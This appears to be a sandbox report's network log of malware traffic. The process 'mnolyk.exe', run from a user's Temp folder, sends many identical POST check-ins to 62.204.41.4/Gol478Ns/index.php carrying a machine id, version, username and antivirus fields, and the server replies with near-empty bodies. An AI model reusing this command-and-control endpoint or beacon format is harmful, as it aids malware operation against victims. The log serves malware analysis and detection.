                                                                    Feb 8, 2023 21:32:19.833365917 CET | 425 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    225 | 192.168.2.3 | 49927 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:20.024415016 CET | 425 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:20.094804049 CET | 426 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    226 | 192.168.2.3 | 49928 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:20.315211058 CET | 426 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:20.379268885 CET | 427 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    227 | 192.168.2.3 | 49929 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:20.553590059 CET | 427 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:20.618046999 CET | 428 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    228 | 192.168.2.3 | 49930 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:20.796642065 CET | 428 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:20.860563993 CET | 429 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    229 | 192.168.2.3 | 49931 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:21.032345057 CET | 429 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:21.097949028 CET | 430 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    23 | 192.168.2.3 | 49725 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:22.403676987 CET | 224 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:22.467572927 CET | 224 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    230 | 192.168.2.3 | 49932 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:21.312522888 CET | 430 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:21.376087904 CET | 431 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    231 | 192.168.2.3 | 49933 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:21.545352936 CET | 431 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:21.608124018 CET | 432 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    232 | 192.168.2.3 | 49934 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:21.786854029 CET | 432 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:21.851677895 CET | 433 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    233 | 192.168.2.3 | 49935 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:22.032744884 CET | 433 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:22.097754002 CET | 434 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    234 | 192.168.2.3 | 49936 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:22.307699919 CET | 434 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:22.371948004 CET | 435 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    235 | 192.168.2.3 | 49937 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:22.552018881 CET | 435 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:22.616642952 CET | 436 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    236 | 192.168.2.3 | 49938 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:22.819597960 CET | 436 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:22.885091066 CET | 437 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    237 | 192.168.2.3 | 49939 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:23.062856913 CET | 437 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:23.127954006 CET | 438 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    238 | 192.168.2.3 | 49940 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:23.296031952 CET | 438 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:23.359333038 CET | 439 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    239 | 192.168.2.3 | 49941 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:23.532205105 CET | 439 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:23.596193075 CET | 440 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    24 | 192.168.2.3 | 49726 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:22.634931087 CET | 225 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:22.698296070 CET | 225 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    240 | 192.168.2.3 | 49942 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:23.769179106 CET | 440 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:23.834645987 CET | 441 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    241 | 192.168.2.3 | 49943 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:24.007317066 CET | 441 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
